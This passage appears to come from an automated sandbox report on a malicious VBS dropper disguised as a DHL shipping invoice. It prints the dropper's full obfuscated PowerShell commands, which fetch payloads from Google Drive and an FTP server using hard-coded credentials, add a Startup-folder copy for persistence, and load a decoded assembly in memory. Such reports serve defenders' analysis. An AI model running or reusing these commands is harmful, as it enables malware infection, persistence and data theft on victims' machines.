[char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeAJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqacaa6ac8alw' + [char]66 + 'zagiazq' + [char]66 + 'saguazw' + [char]66 + 'pac4ayw' + [char]66 + 'vag0alg' + [char]66 + 'iahialw' + [char]66 + '3ahaalq' + [char]66 + 'jag8abg' + [char]66 + '0aguabg' + [char]66 + '0ac8aca' + [char]66 + 'sahuazw' + [char]66 + 'pag4acwavagmabw' + [char]66 + 'nag4ayq' + [char]66 + 'jac8acw' + [char]66 + 'tahmaaq' + [char]66 + 'uagmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauagcaag' + [char]66 + 'nagyaegakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauagcaag' + [char]66 + 'nagyaegakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagagcaag' + [char]66 + 'nagyaegakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + 'nagoazw' + [char]66 + 'mahoajaa7ackaiaanahqaea
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$ylfyq = ($ylfyq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$ylfyq = ($ylfyq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$mjnby = (new-object net.webclient);$mjnby.encoding = [system.text.encoding]::utf8;$mjnby.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhl_shipping_invoices_awb_0000000.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$zfgjg = (new-object net.webclient);$zfgjg.encoding = [system.text.encoding]::utf8;$zfgjg.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $zfgjg.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$zfgjg.dispose();$zfgjg = (new-object net.webclient);$zfgjg.encoding = [system.text.encoding]::utf8;$lbczsg = $zfgjg.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhl_shipping_invoices_awb_0000000.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huupx , 'd d1d' ) );};"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\uxrsw.ps1' ";exit
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqacaa6ac8alw' + [char]66 + 'zagiazq' + [char]66 + 'saguazw' + [char]66 + 'pac4ayw' + [char]66 + 'vag0alg' + [char]66 + 'iahialw' + [char]66 + '3ahaalq' + [char]66 + 'jag8abg' + [char]66 + '0aguabg' + [char]66 + '0ac8aca' + [char]66 + 'sahuazw' + [char]66 + 'pag4acwavagmabw' + [char]66 + 'nag4ayq' + [char]66 + 'jac8acw' + [char]66 + 'tahmaaq' + [char]66 + 'uagmalg' + [char]66 + '0ahgadaanacaakaagaf0axq' + [char]66 + 'bahqayw' + [char]66 + 'lagoayg' + [char]66 + 'vafsaiaasacaaba' + [char]66 + 'sahuabgakacaaka' + [char]66 + 'lagsabw' + [char]66 + '2ag4asqauackaiaanaekavg' + [char]66 + 'gahiacaanacaaka' + [char]66 + 'kag8aaa' + [char]66 + '0aguatq' + [char]66 + '0aguarwauackajwaxahmacw' + [char]66 + 'hagwaqwauadmaeq' + [char]66 + 'yageacg' + [char]66 + 'iagkata' + [char]66 + 'zahmayq' + [char]66 + 'saemajwaoaguaca' + [char]66 + '5afqada' + [char]66 + 'laecalgapacaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaiaaoagqayq' + [char]66 + 'vaewalg' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + '0ag4azq' + [char]66 + 'yahiadq' + [char]66 + 'dadoaog' + [char]66 + 'dag4aaq' + [char]66 + 'hag0abw' + [char]66 + 'eahaaca' + [char]66 + '' + [char]66 + 'ac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwa7ackaiaapacaajw' + [char]66 + '' + [char]66 + 'accaiaasacaajwctitoakyenacaaka' + [char]66 + 'lagmayq' + [char]66 + 'sahaazq' + [char]66 + 'sac4azw' + [char]66 + 'tahoaqw' + [char]66 + 'cagwajaagacgazw' + [char]66 + 'uagkacg' + [char]66 + '0afmanaa2aguacw' + [char]66 + 'haeiabq' + [char]66 + 'vahiarga6adoaxq' + [char]66 + '0ahiazq' + [char]66 + '2ag4abw' + [char]66 + 'dac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'aagmaqg' + [char]66 + 'jageajaagaf0axq' + [char]66 + 'baguada' + [char]66 + '5aeiawwa7accajq' + [char]66 + 'jaggacq' + [char]66 + 'safgajqanacaapqagafgaua' + [char]66 + 'vahuaaaakadsakqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tagqayq' + [char]66 + 'vagwabg' + [char]66 + '3ag8araauagcaag' + [char]66 + 'nagyaegakacaapqagagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaowa4aeyava' + [char]66 + 'vadoaog' + [char]66 + 'dagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauahqaea' + [char]66 + 'lafqalg' + [char]66 + 'taguada' + [char]66 + 'zahkauw' + [char]66 + 'bacaapqagagcabg' + [char]66 + 'pagqabw' + [char]66 + 'jag4arqauagcaag' + [char]66 + 'nagyaegakadsakq' + [char]66 + '0ag4azq' + [char]66 + 'pagwaqw' + [char]66 + 'iaguavwauahqazq' + [char]66 + 'oacaada' + [char]66 + 'jaguaag' + [char]66 + 'iae8alq' + [char]66 + '3aguatgaoacaapqagagcaag' + [char]66 + 'nagyaegakadsakqaoaguacw' + [char]66 + 'vahaacw' + [char]66 + 'pagqalg' + [char]66 + 'nagoazw' + [char]66 + 'mahoajaa7ackaiaanahqaeaJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $qdrfv = $host.version.major.equals(2) ;if ( $qdrfv ) {$tzwou = [system.io.path]::gettemppath();del ( $tzwou + '\upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qvgwd = $env:processor_architecture.contains('64') ;if ( $qvgwd ) {$ylfyq = ($ylfyq + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$ylfyq = ($ylfyq + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$mjnby = (new-object net.webclient);$mjnby.encoding = [system.text.encoding]::utf8;$mjnby.downloadfile($urlkb, $tzwou + '\upwin.msu');$mcydf = ('c:\users\' + [environment]::username );tkplb = ($tzwou + '\upwin.msu'); powershell.exe wusa.exe tkplb /quiet /norestart ; copy-item 'c:\users\user\desktop\dhl_shipping_invoices_awb_0000000.vbs' -destination ( $mcydf + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$zfgjg = (new-object net.webclient);$zfgjg.encoding = [system.text.encoding]::utf8;$zfgjg.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $zfgjg.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$zfgjg.dispose();$zfgjg = (new-object net.webclient);$zfgjg.encoding = [system.text.encoding]::utf8;$lbczsg = $zfgjg.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\dhl_shipping_invoices_awb_0000000.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huupx , 'd d1d' ) );};"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10002933 cpuid 15_2_10002933
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,20_2_0045201B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,20_2_004520B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00452143
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,20_2_00452393
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,20_2_00448484
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004524BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,20_2_004525C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00452690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,20_2_0044896D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,20_2_0040F90C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00451D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,20_2_00451FD0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
